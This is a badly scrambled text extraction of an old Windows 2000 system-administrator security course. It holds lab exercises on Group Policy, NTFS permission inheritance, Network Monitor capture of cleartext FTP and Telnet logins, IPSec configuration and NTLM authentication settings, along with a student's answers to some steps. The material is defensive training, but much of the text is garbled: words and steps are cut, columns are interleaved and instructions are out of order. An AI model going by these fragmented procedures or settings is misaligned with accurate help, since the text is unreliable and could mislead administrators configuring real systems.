59. Close the Active Directory Use
6
6
 
_______________
 
62. How did the order of the GPOs effect the application of policies? 

_
 
_
 
 

Kelly Larsen
SAS2 Exercise B, step 15:  Administrators and Everyone, with their permissions, are inherited plus it allows inherited propagation from the parent.
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 3. Logon to the domain with the LabuserXX user account (password = LUXX-pass).  Are the policies from the 

________________________________________________________________ 

 4. What are the results from loading multiple group policies? 
 

_____________________________________________________________________________________ 

_____________________________________________________________________________________ 

 5. Logoff and logon to the Domain using the LabuserXXa user account (password = LUXXa-pass). 

 6. Does the screen saver display after 30 seconds? 

_____________________________________________________________________________________ 
 
 

 grams, click Administrative Tools, and click Active Directory Users and Computers to open 
e Active Directory Users and Computers snap-in. 

 8. Click the + next to the Domain icon to expand the tree. 
 9. Right-click the OU associated with your machine, and click properties. 
 p Policy tab. 
 elect Properties. 
 2. Click the Security tab. 
 
 “Apply Group Policy” Permissions. 
 5. Click OK and click Yes to affirm the Security window. 
 
 Directory Users and Computers snap-in. 
 8. Reboot the system into Windows 2000 Professional. 
 
 fter 30 seconds? 

 
_________________________________________________________________________ 

 nd click Active Directory Users and Computers to open 
e Active Directory Users and Computers snap-in. 

 
 3. Right-click the OU associated with your machine, and click properties. 

 
 4. Click the Group Policy tab. 
 ver 

e Disable Computer Configuration settings check box, and click OK 
 close the OUXX Screen Saver Policy properties window. 

 6. Set No Override on the OUXX Screen Saver Policy GPO (highlight the OUXX Screen Saver Policy GPO, click the 
ptions button, select the “No Override: prevents other Group Policy Objects from overriding policy set in this one” 

 7. Click OK to close the OU properties window. 

6
SECXX Screen Saver Policy still in effect? 
 
______________________
 
 
6

_
 
 
_
 
Security Group Filtering 
 
 In this part of the exercise, you will modify which security group’s are affected by a GPO. 
 
6
 
6
 
_

67. Click Start, point to Pro
th
6
6
70. Click the Grou
71. Right-click the OUXX Screen Saver Policy GPO and s
7
73. From the “OUXX Screen Saver Policy Properties” window, highlight the LabuserXXa user account. 
74. Check the Deny 
7
76. Click OK to close the OU properties window. 
77. Close the Active 
7
79. Log on to the Domain using the LabuserXXa user account (password = LUXXa-pass). 
80. Does the screen saver display a

_____________
 
No Override 
  
81. Click Start, point to Programs, click Administrative Tools, a
th
82. Click the + next to the Domain icon to expand the tree. 
8

8
85. Enable the computer configuration settings of the Screen Saver Policy GPO (highlight the OUXX Screen Sa
Policy GPO, click the Properties button, uncheck th
to
8
O
check box, and click OK. 
8

Kelly Larsen
SAS2 Exercise B, step 19:  Administrators and Everyone permissions propagated to file1.txt


Kelly Larsen
SAS2 Exercise B, step 27:  The ACL mirrors that of stage2 with the exception that the file does not allow for listing of folder contents.


Kelly Larsen
SAS2 Exercise B, step 35:  No, The new file was not successfully created.  The error message Unable to create file, "access denied" was received


Kelly Larsen
SAS2 Exercise B, step 36:  Yes
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 8. Close the Active Directory Users and Computers window. 
 9. Reboot the system into Windows 2000 Professional. 
 age text for users attempting to log on policy display? 

_________________________________________________________________________ 

__________________________________________________________ 
 

 
 91.  What does the Message title for users attempting to log on policy display? 

 
______________________________________________________________________________________ 
 
______________________________________________________________________________________ 
 

 92.  How does implementing the no override setting on the OUXX Screen Saver Policy effect the application of 
policies? 
 
______________________________________________________________________________________ 
 
______________________________________________________________________________________ 
 
 
 

 Wait for instructor review 
 
 
 

8
8
90.  What does the Mess
 
_____________
 
____________________________
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Acces

to a specif
scriptors inclu

s which user
ns with ob

 authenticat
issions determ

• Administrators can assign  to objects

3-1

s Control

ic object attribute.
de an access control list (ACL)
s have permission to perform 
jects
ion, either the users rights or 
ine the type of access granted
 security descriptors

• Control access 
• Security de
• ACLs define

particular actio
• After account

object perm
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Practical Exercise SAS-2F
EXERCISE E 
This practical exercise will provide h
Please retain from the instructor the a
 
1. Log on locally to the W2KServer,
 
2. Select Start->Programs->Accessor
 
3. Open the root of the W2K Server (
 
4. Create a new folder name stage1.  e File 
Menu dropdown. 
 
5. Right-click the folder, stage1. 
 
. Select Properties.  On the Properties Window select the Security tab. 

7. On the Properties window, clear the Allow inheritable permissio s from parent to propagate to this object checkbox. 
 
8. On the Security window, select Remove to discard all inherited ACEs. 
 
9. On the Properties window, select the Add button (near the top of the right side of the Window).   
 
10. If the Network Password Window appears, select cancel.  On the Users, computers or Groups Window, at the Look 
in drop-down box, select the current workstation name. 
 
11. Select the Administrators group and click ADD.  Select the Everyone group and click ADD.  Click OK to close the 
Permissions Window. 
 
12. On the properties windows, configure two ACEs: Administrators: Full Control, Everyone: Read & Execute, List 
folder Contents and Read. 
 
13. Click OK to save the new ACL. 

4. Open the stage1 folder (double-click folder to open) 

ubfolder inside folder stage1, named stage2.  On the right-hand side panel, right-click and select New-
>Fold enu dropdown.  

 the stage2 folder. S  on the stage2 
ned? 

select "a w o this object".  Click 
 box appears.  Click operties box 

(double-click fol e

amed file1.txt. n  Document or 
own. 

 

ands-on experimentation with file permissions including inheritance. 
ppropriate drive letter or partition to use in place of W2K Server. 

 using the administrator account (pwd = student). 

ies->Windows Explorer 

MyComputer\W2KServer). 

On the right-hand side panel, right-click and select New->Folder or use th

6
 

n

 
1
 
15. Create a s

er or use the File M
 
16. Right click on
folder.  How is the ACL defi
 
 
 
  
 
17. On the properties window, un
on copy when the security
 
18. Open the stage2 folder 
 
19. Create a new text file n
use the File Menu dropd

elect Properties.  Select the Security Tab.  Verify the default ACL

llo  inheritable permissions from parent to propagate t
 OK in the stage2 pr

d r to open). 

  O  the right-hand side panel, right-click and select New->Text
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ght-click file1.txt.  Select Propertie  Security tab and verify the 
permissions. 
How is the ACL defined? 
 
 
 
21. Close the Permissions window for file x
 
22. Click on the back button, right cl k stage2, select Properties, and select the Security Tab to open the Permissions 
window for stage2. 
 
23. Click Add, if the Network Passw the 
current workstation name. 
 
24. Select labuserXa, click Add, clic  box for Deny Write.  This will add an ACE to explicitly deny write 
access to user labuserXa. 
 
25. Click OK. 
 
26. Select YES to the Security Caution window. 
 
27. Open stage2 (double-click) and right-click operties, select the Security Tab and verify the 
permissions. 
How is the ACL defined? 
 
 
 

28. Close the Properties Box, by selecting e

9. Click on the back-button, right-click stage2, select Properties, select the Security Tab to open the Permissions 
window for stage2. 
 
30. Click Add, if the Network Password Window appears, select cancel.  At the drop-down box, select the current 
workstation name. 
 
31. Add an ACE to explicitly granting write access to authenticated users.  Select authenticated users group, click Add, 
click OK, and click Allow Write. 
 
32. Click OK. 
 
33. Log off of the administrator account. 
 
34. Log in as the labuserXa account (password = LUXa-pass). 
 
35. Select Start->Programs->Accessories->Windows Explorer 
 
36. Drill down to the stage2 folder (double-click MyComputer\W2Kserver\stage1\stage2). 
 
37. Attempt to create a new text file named file2.txt.  Right-click and select New->Folder or use the File Menu 
dropdown.  Was the new file successfully created? 
 
 
 
38. Open the file1.txt file.  Attempt to make changes to the file and save it.  Was the file modification successful? 
 

 
20. Ri s.  On the Properties Window, select the

1.t t by pressing the OK button. 

ic

ord Window appears, select cancel.  At the Look in drop-down box, select 

k OK, click

 on file1.txt, select Pr

  
 th  OK button. 

 
2
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40. Log out. 

ctor review.  

 
 
39. Close all windows. 
 

 
41. Wait for instru
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3-1

Protect Files and Directories

• Clean-installed Windows 2000 systems have 
secure default ACLs on the file system.

• Upgrades from previous versions (e.g., Windows 
ous security 

 
 
File

NT 4) do not modify the previ
settings.

• The default Windows 2000 settings should be re-
applied. 

, Directory, and Registry Permissions 
Vulnerability Countermeasures 

Clean-installed Windows •
2000 systems ha

efault ACLs o
ve secure 

n the file 

security settings and should 
have the default Windows 
2000 settings applied. 

 Users are the opposite of administrators. Provided that the 
Windows 2000 operating system is clean-installed onto an 
NTFS partition, the default security settings are designed 

m compromising the integrity of the 
 cannot 

modify computer-wide registry settings, operating system 
files, or program files. Users cannot install applications 
that can be run by other members of the Users group 
(preventing Trojan horses). Users cannot access other 
users' private data. 

• Below are the minimum recommended settings for users 
providing that you upgraded from a 4.0 system. 

Users Write Access Locations  
 
Object 

d
system. However, upgrades 

om previous versions to prohibit Users frofr
(e.g., Windows NT 4) do 
not modify the previous 

operating system and installed applications. Users

                       Permission                Comment 
 
HKEY_Current_User    Full Control            User's portion of 
                                                                       the registry 
 
%UserProfile%               Full Control            User's Profile 
                                                                        directory 
 
All Users\Documents     Read, Create File    Shared  
                                                                        Documents 
                                                                        Location. 
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                                                                        Allows Users to  

                                                                 can subsequently  

                                                                                other Users.  

File, Add Subdir     Per-Machine 
                                                                         temp directory. 
                                                                         This is a  
                                                                        concession made  
                                                                        for service-based 

                                                       applications so 
                                                                        that Profiles do  
                                                                        not need to be 
                                                                        loaded in order  

                                      to get the per- 
                                                                        User temp  
                                                                       directory of an  
                                                                       impersonated 
                                                                        user. 
 

Not Configured      Not configured 
                                        during                    during setup 
                                        setup                       because the  
                                                                       Windows 2000 
                                                                       ACL Inheritance 

ld 
                                                                        objects 
                                                                       including those 
                                                                       outside the  

                                                                        create files that 
       
                                                                        be read (but 
                                                                                        not modified) by  
       
 
%Windir%\Temp            Synchronize, Traverse, 
                                    Add 

                 

                                  

\ (Root Directory)           

                                                                       model would 
                                                                       impact all chi

                                                                        scope of setup 
. 
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3-1

Services

3-1

System Administrator/Network Manager 
Security Course

• Default services in Windows 2000
• Vulnerabilities with unneeded services
• Turning off unneeded services

- Using Snap-in
- Using Command Line

W2K Checklist 

 

Network Security

 
 
Services 

Vulnerability Countermeasure 
By default, services are 
start
LocalSystem account in 
Win
LocalSystem account has 
unli
the service, but also to the 
serv
com romised, an intruder 
can 
that will be executed during 
or u  the 
service.  The code can be 
any
Troj  on the server to 
alte em 
files. 

COUNTERMEASURE A: 
lize the Services Snap-in within the Microsoft 

C) to start and stop services 

remotely: 
 

. 
• Type in MMC. 
• Once the MMC console box comes up left-click on 

Console from the tool bar. 

t-click Add, 
Close, OK. 

•

ectory and reboot the 

• From here you can double-click on the services that 
.  

 
Note:

ed under the � 1. Uti
Management Console (MM
within W2K.  This tool can be used both locally and 

dows 2000.  The 

mited access not only to 

er itself.  If 
p • Click the Start button and choose Run
insert malicious code 

pon completion of

• Choose Add/Remove Snap-in. 
• Left-click Add, choose Services, lef

thing from installing a 
an

ring/deleting syst
 Expand the Services policy. 
• Choose the Services to stop. 
• Save the policy to the default dir

server. 

you wish to modify

 
The Services snap-in is the preferred method to manage your 
services within W2K.  It provides a central point of 

ervice is not needed, stop it. management.  If the s
 
COUNTERMEASURE B: 
� 1. Utilize the command line tool net.exe.  It exposes basic 
start/stop/pause and query functionality. 
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• From the command line, type net.exe to view the 
available syntax 

• To stop a service, type net stop service. (service being 
the name of the service you wish to stop) 

et start service.  Without a 
parameter, this command will provide a list of started 
services. 

• To pause a service, type net pause service. 

• To start a service, type n
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Pra
EX C

o

 

W2K System Security 

ctical Exercise SAS 2B 
ER ISE B 

Netw rk Monitor  

Network Monitor 
et stic tool that allows you to examine network traffic to and from the server at the 
ack e ing network traffic for later analysis, giving you a more technical method of 

 
We need itor program if not in Administrative Tools: 

 (if th
1. emove Programs   

        
2. ve Windows Components 
 
3. 
 
4. cked 

5. 

6. 

7. 

8. ask for the Win2K CD Click OK 

9. 

10. 

11. 

12. 

13. 

N
p

work Monitor is a Microsoft diagno
et l vel. It also allows captur

performing a specific security check.   

I.  Getting Started: 

 to add the Network Mon
  ere, skip to section II of this PE) 

Begin by selecting Start–Settings–Control Panel–Add/R
        

Select Add/Remo

Scroll down to Management and Monitoring Tools and Double click 

Select Network Monitor Tools – make sure the box is che
 

Click OK 
 

Click Next 
 

Accept Remote installation mode - Click Next 
 

A prompt will 
 

Enter Copy files from: C:\i386 
 

Click OK 
 

Click Next 
 

Click Finish 
 

Click Close 
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II.  The Network Monitor is now installed on your system.  
 
1. Execute the monitor by clicking on Start --> Programs --> Administrative Tools --> Network Monitor 
 
2. Click OK  
 
3. At the “Select a network” box, expand the “Local Computer” 
 
4. Select the bottom Ethernet card and Select OK 
 
5. Maximize your network monitor screen 
 
6. In the tool bar at the top of the screen, click the funnel (filter) shaped one 

This will allow us to edit the capture filter 
 

7. An information box pops up. Read it and briefly explain what this means. Click OK 
 
8. In the Capture Filter window select [Address Pairs] (by double clicking) 
 
9. In the Address Expression set the filter to include ANYGROUP  <---> ANY 

This allows us to include and exclude entries for detection from station to station.  
It also allows us to control the directional flow of data we detect. 
 
Can we set the filter to only capture outgoing broadcast traffic from the local host?  If so how could we do this? 

 
it out of . 

ffic goin  include general broadcasts 

10
 

. 

11. Click OK 

12. You can click OK to ex
 
*We will now capture all tra

the Capture Filter window

g to or coming from this machine to
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ork Traffic 
 
1. In the tool bar at the top of the N n on a VCR. 

This will start the network captu
 
2. After allowing the Network Monitor t
 
3. Click on the eyeglass ICON in th r to view captured data. 
 

IV.  Analysis: 
 

1. Which protocol was the mo
 
 
 
 

2. What was the most common
 
 
 
 
 
 

3. What was the most common De a
 
 
 
 
 

4. By clicking on Display ---> Col  s n protocol to be a different color than the rest, click 
OK. How can changing the colo h ocols be beneficial to the administrator? 

 
 
 
 
 

5. Take a closer look at the Ethernet Fra of the Frames in the list. If a password were 
ext, would it be viewable by the Network Monitor?  

Yes / No

 

III.  Capturing Netw

etwork Monitor screen, click on the ICON shaped like the play butto
re 

o run for a minute or two stop it.  

e toolba

st common? 

 Source MAC Address? 

stin tion MAC Address? 

ors et the most commo
rotr sc eme on certain p

me. Double Click on one 
sent across the network in clear t
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Text Vulnerability 

 

 

V.  Clear 
 
Utilizing our partner PC we will examine clear text vulnerability and how to utilize IPSecurity to counteract this 
vulnerability.  We will change the filter to only capture traffic between out partner PC’s.  We will then Ping, FTP, and
Telnet to our partner PC.   
 
** Please stay in sync with your lab partner 
 

1. Both Users 
 
2. From menu at the top of the screen - Select Window then the – Ethernet … Capture Window – session 

3. Click on the Funnel icon 

4. ROUP < -- > *ANY 
 

 
6. Click Edit Addresses. 

7. 
 

 IP) 
 

 
 f IP) 

 
 

 
 

SXXX (your machine name) <--> sanmxxx (your partner pc) 

 

Now we
The filter should look like Your machine name(IP) < -- > Your partner PC(IP) 
 
15. 
 

**Once  partner have completed this step 
 

 
1. s

 

 
Double Click INCLUDE *ANY G

5. Now we will add in our partner PC 

 
In the Address Database select Add. 

8. Enter Partner PC name – wsxxx (xxx is the last octet of

9. Change Type to IP 

10. Enter your Partner PC IP address – 147.51.217.xxx (xxx is the last octet o

11. Select OK 
 
12. Click Close 

13. Set the filter to W
 
14. Select OK 

 will only capture packets between our two machines 

Select OK to close the Capture Filter window 

 both you and your lab

PING session 

Both User  
 

 
3. 

2. Click the record button to start the recording session 

One of the users - Open a command prompt – start – run – type cmd 

Ping your partner PC – type PING 147.51.217.
 
4. xxx 

 

 
5. Once the Ping has finished – stop the capture 
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7. What did we capture? 

 

TP session - We will now FTP from one box to the other 

6. View what has been captured 

F
 
 

1. Both Users 
 
2. From menu at the top of the screen - Select Window then the – Ethernet … Capture Window – session 

4. One of the users

 
3. Click the record button to start the recording session 

 
 - start – run  

 
5. Enter ftp 147.51.217.xxx (partner PC) 

 
6. Enter administrator as user and student as password 

 
7. At the ftp> enter bye  

 
8. Both Users 

 
9. Stop the capture 

 
10 View what has been captured . 

11. assword?  
 

What did we capture?  Can you locate the User name and p
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elnet session - We will now Telnet from one box to the other 

 

T
 

1. One of the users – Nee
 

ds to start telnet 

lnet administrator 

egistry Settings 

y we want to change this value 

e hat Telnet will prompt you for a password.  Telnet will now prompt you for 
 us ing NTLM and the password 
ou

2. Select Start–Run–enter–tlntadmn.exe – this will open the te
 

3. Type an option number – enter 3 – Display / Change R
 

4. Type an option number – enter 7 – NTLM – enter 
 

5. Enter 0 for NTLM value 
 

6. Confirm change with y 
have just changed the NTLM setting so tW

a er Id and password.  If this setting was not changed Telnet would authenticate us
ld be encrypted.  However, all other communication would not be encryptedw . 

 
ele7. S ct 0 to exit this menu 

 
8. Select 4 to start telnet [Telnet is now up and running] 

 
9. Both Users 
 
10. From menu at the top of the screen - Select Window then the – Ethernet … Capture Window – session 
 
11. Click the record button to start the recording session 

 
12. The user that did not setup Telnet  - Click – start – run  

 
13. Enter telnet 147.51.217.xxx (partner PC) 

sword 

rectory to change to) 

 
14. Enter administrator as user and student as pas

 
15. Type dir 

 
16. Type cd  (find a di

 
17. Type dir 

 
18. Type Exit 

 
19. Both Users 

 
20. Stop the capture 

 
21. View what has been captured 

 
22. What did we capture?  Can you locate the User name and password?  How about the commands that were 

issued?  Telnet is different from FTP, look very closely. 

23. What are some things we can we do to protect our selves from clear text vulnerability? 
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IP Security

• How IPSec works
– Cryptographic based security for IPv4/6
– Internet Layer Protocol

– o

• Provides
– Authen
– Integrity Protection

 

– 2 security modes
– Uses shared public key

L cal Policy of GPO driven

tication

– Data Confidentiality

 

3-1

IPSec 
(End to End Security)

Gateway

NetworkNetwork NetworkNetwork

Application

Network +

Transport

Application

Gateway

ApplicationApplication

Transport

Network +
Application

Internet

 
 
IP Security 

Vulnerability Countermeasure 
One
sec
network is network 

icy  
• Open Network and Dial-up Connections  

 of the biggest Countermeasure A 
urity issues on a � 1. Select an IPSec pol
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traf
wire as unencrypted, or 
lea
our information is 

trav
as most SMTP, Telnet, 

HT
oe
as
ou

can listen in and read 
any unencrypted 

af
ne
ou
ulnerable to many 

diff
s, n ing, 

Man-in-the-Middle, 

Click Local Area Connection, and on the File menu, 
erties.  

erties dialog 
box, under Components checked are used by this 

ol (TCP/IP), and 
then click Properties.  

k Advanced, and then click the Options tab.  
Optional settings, click IP security, and then 

click Properties.  
IP security policy, and then select the 

IPSec policy you want from the drop-down list.  
 

       Client (Respond Only): Communicate normally 
cured). Use the default response rule to negotiate 

t security. Only the requested 
traffic with that server is secured. 

 
       Secure Server (Require Security): For all IP traffic, 

rberos trust. Do NOT 
allow unsecured communication with untrusted clients. 

 
       Server (Request Security): For all IP traffic, always 

request security using Kerberos trust. Allow unsecured 
communication with clients that do not respond to 
request. 

must be a member of the Administrators group to set 
et Protocol security (IPSec) policies. If the computer 

participates in a Windows 2000 domain, the computer may 

Countermeasure B 
 method of selecting IPSEC Policy is 

through the MMC. 

• Click the Start button and choose Run. 
• Type in MMC. 
• Once the MMC console box comes up left-click on 

Console from the tool bar. 
• Choose Add/Remove Snap-in. 
• From the Snap-in window choose Add. 

cies on Active Directory. 
• Choose Close. 
• Choose OK. 

fic passed along the • 

c r-text, data.  When 
click Prop

• In the Local Area Connection Prop
y

eling as clear-text connection, click Internet Protoc
(

TP, and FTP traffic • Clic
d s), an attacker who 

 gained access to 
• Under 

h
y r physical network • Click Use this 

tr fic.  By allowing 
ncrypted traffic on 

IP Security Policies: 
u
y r network, you are (unse
v

erent attacks such 
with servers that reques
protocol and port 

a etwork sniff

and spoofing just to 
ame a few. 

always require security using Ke
n

Note: 
You 
Intern

receive the IPSec policy from Active Directory, overriding 
the local IPSec policy. In this case, the options are disabled 
and you cannot change them from the local computer. 
 

� 1. An alternative

 

• Choose IP Security Poli
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• Expand the policy and choose which policy best 
meets your requirements. 

• Save the new settings under the default directory and 
reboot the server. 

 
IP Security Tunneling Mode 

Vulnerability Countermeasures 
IPS
spe

ses computer 
cer
ertific
al
ith access to the 

endpoint computer has 
cc t

 ode, use PPTP or L2TP 
over IPSec. 

 

ec Tunneling modes � 1.  When using IPSec in tuning m
cifies endpoints and 

u
tificates vice user 

ates for 
Note: L2TP over IPSec is the W2K default. 
 c

v idation. Any user  
 w

a ess o the tunnel. 
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IPSEC 

Practical Exercise SAS-2G 
This practical exercise will provide hands-on training using Internet Protocol Security (IPSec) to 
encrypt network traffic.  IPSec provides the ability to authenticate and encrypt network connections 
between two computers.  You will need to synchronize your steps with your PARTNER on another 
machine.  This practical exercise will be performed in Windows Server. 
 
I.  a. activate an IPSec Policy on Work Station #1 
  

1. Log on locally to W2Kserver, using the administrator account 
 

2. Using ADMIN Tools, run the Local Security Policy MMC plug-in.  If not available, create custom snap-in for 
Local Security Policy and save it. 

 
3. In the Local Security Policy setting box, click on IPSec Policies on Local Machine 

Note the three entries in right pane:  Client, Secure Server, and Server 
 

4. Right-click Secure Server (require security), and then choose Assign.  The status in the Policy Assigned 
Column should change from No to Yes. 

 b.      activate an IPSec Policy on Work Station #2 

 IPSec Policy on Work Station 2, execu

 should be

lick Client, and then o

n the Policy

s

 
   
 

5. To Active an te steps 1-3 above. 
 

6. Three entries
 

7. Right c
 
8. The status i

 
    Both Computer

 in right pane:  Client, Secure Server, and Server 

 ch ose Assign.  

 Assigned column should change from No to Yes. 

: 

e computer (wk s
 

9. Note:  Now on tation #1) is acting as a secure server, and your partners computer (wk station 
 the client#2) is acting as .  The client will initially send unprotected ICMP Echo packets (ping) to the server, 

er will requ e client, after the rest of the communication will be secure. 

rver was to initiate th fore the server 
nprotected pings or any  
ata was se e neither 

s security. 

twork monitor by click Network 

c monitor by clicking 
 Security Monitor dialo ons are 
ful and will be displayed a o the IPSec Policy, 

ctive Filter Actio

k the Options

but the serv
 

Why ? If the se
would send u
application d
side request
 

  
10. Execute the ne

Monitor 
 

11. Execute  IPSe
The IP
success
A

est security from th

e ping, the ping would have to be secured to the client be
 other traffic because it would request IPSec protection before any

 no data would be protected, becausnt.  If both computers had client policies,

ing on Start --> Programs --> Administrative Tools --> 

on Start --> RUN -- > ipsecmon -->   
g box will open and confirm if your Active connecti

nd contain information relating t
n and IP Filter List. 

 
12. Clic  button to change refresh rate to 1 --- > select ok --- > minimize. 
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, open a IPSEC 
d.  If  n

 Security Monitor, a

ng comm

onitor a

13. Wk Station # 2
being negotiate

 
14. Restore the IP

machines 
 

15. Repeat the pi
 

16. Stop the Net M
 

17. Note:

 command window and ping Wk station # 1.  The command window will show 
egotiation is not viewed continue on the P.E. 

nd review Security Association between the two  

and until you see successful ping replies. 

nd review captured packets. 

  Y
 

18. Un-assign Wk S
Local Machine in Le

 
 
 
II. Creating a Cu
 

1. Create IP Se
 

2. In left pane of IP Se
 

3. Right clic
 

4. When the IPS
 

5. Type the policy
 

note:  The Re
 

6. Verify t
 

7. Accept 
 

8. Leave the E
 

9. Clear th
 

10. In Rules ta
 
1. Note:  You wi

 

ou should see IPSEC e description of the event. 

tation licies on 
ft Pa

stom Ma

curity Policy sn -i

curity Polic

k on IP Security Policy s select Create IP Security Policy 

ec Policy wizard appears, click the Next Button 

 name IPSEC Custom1, in text box add Information Assurance click NEXT button 

quests For Secure Connection page appears  

hat the Active The Default Response Rule check box is selected, click NEXT 

default response, (Kerboes Rule Authentication Method Box) click next 

dit Properties check box selected, click Finish Button 

e Use Add Wizard in the newly created IPSec Custom1 properties Box. 

b of properties dialog box, click ADD button. 

ll be configuring filters between your computer and your partners computer.   

2. Click the ADD button in the IP Filter List tab. 
 

. Workstation #1  

 In IP Filter List pane, highlight and re stomFilter1 Host A to B. 

ation #2 

i. In IP Filter List pan ost B to A. 

 Wizard check bo

Security Association.  Review th

 #1 and Wk Station #2.  In right pane, right click policy, (IP Security Po
ne), and then click Unassign. 

nagement console for local IPSec Policy 

ap n and save it as Ipsec.msc 

y  

a
 

i. name the filter to Cu
 

b. Workst
 

 
 

3. Both Computers 
 

4. Clear the Use Add

e, highlight and rename the filter to CustomFilter1 H

x. 
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t tab, click AD  button.(filter prop x appears) 
 

5. In Ip Filter lis
 

6. In Source Address list, select 

D erties bo

Sp iecif c IP address. 
 

7. Input your ip address. 

Address list, s c
 

8. In the Destination ele t A specific IP Address 
 

9. Input your partners IP address, click OK ,  click close 

ter1
 

10. In IP Filter List tab, select CustomFil  option 
 

11. Open Filter Action tab, clear the Use Add Wizard check box, and then click add 
 

12. Security Methods tab, click ADD 
 

13. In New Security Method dialog box, select Medium (AH) option, click OK 
 
 

III. Next task is to configure input and output Filter Action:     
 
Note:  Filter Action specifies what security action will take place upon starting a filter.  The action specifies whether to 
permit the traffic, block the traffic, or negotiate the security for the given connection.  In addition, additional settings 
are available to react if non-IPSec protected data is received.   
 
 

14. Highlight or click New Filter Action Properties dialog box, open General tab. 
 

15. In the Name box, type MediumFilter, enter description then click ok 
 

16. Close dialog box 
 

17. select the option button next to MediumFilter. 
 

18. Open Authentication Methods tab. 
 

19. Click add button. 
 

20. The new Authentication Method dialog box appears 
 

21. Select the Use This String to Protect The Key Exchange (preshared key) 
 

22. In the New Authentication Method properties, Type informationassurance in the text box, click ok  
 

23. Select Preshared Key in the list, click the Move Up Button. 
 

24. Click Close to return to the Policy Properties dialog box and to complete the creation of this rule. 
 

25. Click Close in the Policy Properties dialog box. 
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Testing a Custom Policy 
 

Note: Ensure you and your partner are working together.  
 

26. Assign the policy just made (IPSec Custom1)  
 
27. In right pane of custom console, r-click the IPSec Custom1 policy, click assign 

 
28. The policy Assigned column value is set to yes. 

 
29. Bring up IPSecmon and review security association and IPSec statistics 

 
30. PING your partners computer 

a. The first ping will usually fail due to time it takes to negotiate policy. 
i. with matching policies on both com ers, future pings will work. 

ii. Alternatively, enable and disable the policy to see the effects of non-matching policy 
settings. 

 

put

Note:  In IPSec Monitor, you will see in the Security Association Box, the policy name, security, filtername, 
st address, protocol, src port, dst port and P Stat 

view informat

ew IPSEC integrity pack

src address, de  tunnel equipment.  I
 

31. Stop !!! and re
 
 
 

 
 

 
To vi

ion. 

ets (AH format) 
 

32. 1. Start Network Monitor an
appropriate media access co
 

33. In MMC interface, assign IP
 

34. Start capturing packets w/ N
 

35. Start ipsecmon 
 

36. Ping second computers IP a
Note: may have to repeat be n 
between two computers.  No

 
 

37. Stop and view the capture on NETM
 
 

38. Double-click

d if not set from previous Practical Exercise set the capture network to the 
address network card. ntrol 

Sec Custom1 policy. 

ETMON 

ddress.   
cause PING has a short time-out, and the delay establishing IPSEC associatio

ice IPSec Negations is command window. t

ON. 

 the first Internet Contr
 

Note:  you should see heade
 

39. Expand IP entry and record _______. 
 
40. Record Number of Data By
 
 

ol Message Protocol (ICMP) packet 

rs for frame, Ethernet, IP, AH and ICMP in detailed pane. 

 IP Protocol number._________________

tes remaining ___________ 
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41. Notice IP payload is in clea
 
42. The data for a PING is __________

 
 

Now we will initiate FTP tions utilizing IPSec. 
 

43.  Open a command prompt – 
 

44. Enter ftp xxx.x.xxx.xx (partner PC)  

45. Enter administrator as user and student as password 
 
46. Type bye 

 
47. The user that did not setup Telnet 

r text.   

_________. 

and Telnet connec

start – run  

 

 - Click – start – run  
 

48. Enter telnet xxx.x.xxx.xx (partner PC) 
 

49. Enter administrator as user and student as password 
 

50. Type exit 
 

Now let’s see if we can still see our user and password information 
 

51. Both Users 
 
52. Stop the capture 

 
53. View what has been captured 

 
54. What did we capture for FTP and Telnet ?  Can you locate the User name and password? 

 
55. What protocols did we pick up?   

Note:  refer to reading assignment 
 
EXERCISE 1. To set higher encryption:  By configuring AH security method, we ensured authentication 
but did not encrypt the data in the packet.  AH just makes sure that the packet data, as well as mot parts of the IP 
header, source and destination IP addresses, are not modified.  We will now look at traffic using the ESP security 
method that will encrypt the data part of the IP packet. 
 
 

56. Right-click IP Security Policy on Local Machine 
 
57. Click manage IP Filter Lists and Filter Action 

 
58. Click Manage Filter Action tab 

 
 
59. Select Medium Filter 
 
60. Click edit 

 
61. Click edit, In Medium Filter Properties to change security method 
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 (ESP) 

ng packets with Network Monitor 

to repeat because PING has a short time-out, and the 
ers 

69. iew IPSec Mon 
 

71. Double-click the first ESP frame 

ntries in the details pane are:  Frame, Ethernet, IP, and ESP:SPI 
IPSEC has created a hash of the ICMP and Data fields of the frame 

he IP:   

75. y configuring the ESP Security Method the data part of the IP packet was encrypted where as by just 
nfiguring AH security we all ensured authentication of the packet was ensured. 

 

, instead 

62. Change Medium to High
 

63. Close all Dialogue Boxes 
 

64. Assign the IPSec Custom1 Policy 
 
View IPSec encrypted (ESP) Packets. 
 
65. Begin capturi

 
66. Run IPSECMON utility 

 
67. Ping your second computers IP address.  Note: may have 

delay establishing IPSEC association between two comput
 

68. See results of the negotionation ( ipsecurity negotionation) 
 

V

70. top and view the NETMON S
 

 
72. The four e

 
73. Expand the IP section and record the IP Protocol 

 
74. Scroll to the bottom of the IP details and double-click t

 
Data: Number of Data Bytes Remaining will vary but you will see the data has been encrypted verses results 
in step = 42 (0x004c) line.  Look at the Hex pane; you will see the data has been encrypted instead of results 

f when the IP Payload was in clear text.  o
 
 B
co

 
 
 
 
 
 
 
 

 

FINISHED !!!!!!!!!!!!!!!!!!!!!!! 
 

Bonus:  Repeat steps 65-76
of ping use telnet and ftp and view 

the results. 

Kelly Larsen
SAS2 Exercise A, step 5: The groups are Authenticated Users, Backup Operators, Domain Users, Everyone, Interactive, Local.  Some of the privileges are disabled to prevent some of the enabled groups from using.


Kelly Larsen
SAS2 Exercise A, step 8: Access was denied.


Kelly Larsen
SAS2 Exercise A, step 16: Access was allowed to the folder.
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3-1

Authentication

• Authentication in Widows 2000
• NTLM vs. NTLMv2

-Vulnerabilities
-Countermeasures

• Support for legacy systems

 
 
Authentication 

Vulnerability Countermeasure 
Authentication is 
the process 
whereby the 
computer takes the 
typed username 
and password and 
compares it to the 
Security ID 
assigned to it, after 
the comparison 
matches the user is 
authorized to use 
the items that the 
security token is 
assigned to.  If an 
insecure method is 
utilized to 
authenticate a user, 
persons may gain 
unauthorized 
access to your 
system. 
 
Note: For 

COUNTERMEASURE A: 
� 1. Define a particular level of authentication 

• Start Registry Editor regedt32 
• Find the following Key  

HKLM\System\CurrentControlSet\Control\Lsa\LMCompatibility
Level   

• Data Type             Range       Default Value 
REG_DWORD    0x0–0x05       0xYY 

 
Where YY equals 
0 = Send LM & NTLM responses 

1 =Send LM & NTLM – use NTLMv2 
session security if negotiated: 

2 = Send NTLM responses only:  
3 = Send NTLMv2 responses only:  

4 = Send NTLMv2 responses 
only\refuse LM5 = Send NTLMv2 
responses only\refuse LM and NTLM:  

 
Note: Default value for the above 

registry entry is 0. 
 
Warning:  Setting this value higher than 2 on a Windows 2000 
system could prevent some connectivity to systems that support 
